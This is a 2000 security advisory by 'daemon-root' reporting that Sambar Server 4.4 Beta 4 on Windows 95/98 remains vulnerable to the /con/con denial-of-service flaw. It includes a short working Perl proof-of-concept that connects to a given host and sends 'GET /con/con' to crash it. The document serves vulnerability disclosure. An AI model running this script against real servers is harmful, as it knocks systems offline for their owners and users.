dae_sambar44.pl

`daemon-root's security research   
Advisory Name: dae_sambar44b4  
Release Date: 10 November 2000  
Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)  
Platform: Windows 95, 98  
Severity: The server is still vulnerable for the infamous /con/con exploit  
Author: daemon-root ([email protected])  
Web: http://www.daemon-root.da.ru  
  
  
Overview:  
  
Sambar Server is a free, multithreaded HTTP server for Windows 95/NT.   
Its features include HTTP proxy, search engine, log analysis, security,   
server-side scripting, and DLLs. This program includes an unbuffered CGI support,   
native FTP proxy, a sacrypt encryption utility, and significantly faster   
full-text indexing, yet it's still vulnerable for the infamous /con/con exploit   
such as in the previous versions of Sambar Server.  
  
  
Proof of concept code:  
  
[dae_sambar44.pl]  
  
# Sambar Server 4.4 Beta 4 Windows /con/con Exploit  
#  
# Bad Perl Code by: daemon-root   
# Website: http://www.daemon-root.da.ru  
#  
# This is for EDUCATION purposes ONLY!   
  
use IO::Socket;  
  
print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";  
print "=================================================\n";  
if (not $ARGV[0]) {  
print "Usage: $0 [host]\n\n";  
exit(0);  
}  
sub connecthost {  
$host = IO::Socket::INET->new ( Proto => "tcp",  
PeerAddr => $ARGV[0],  
PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";  
$host->autoflush(1);  
}  
$exploit .= "/con/con";  
print "\nOpen connection...\n";  
&connecthost;  
print "Sending characters...\n";  
print $host "GET $exploit HTTP/1.0\n";  
print "close connection...\n";  
close $host;  
  
[END OF dae_sambar44.pl]  
  
Vendor status:  
  
The vendor has been informed on 10 november 2000.  
______________________________________________________________  
daemon-root's security research - http://www.daemon-root.da.ru  
  
  
`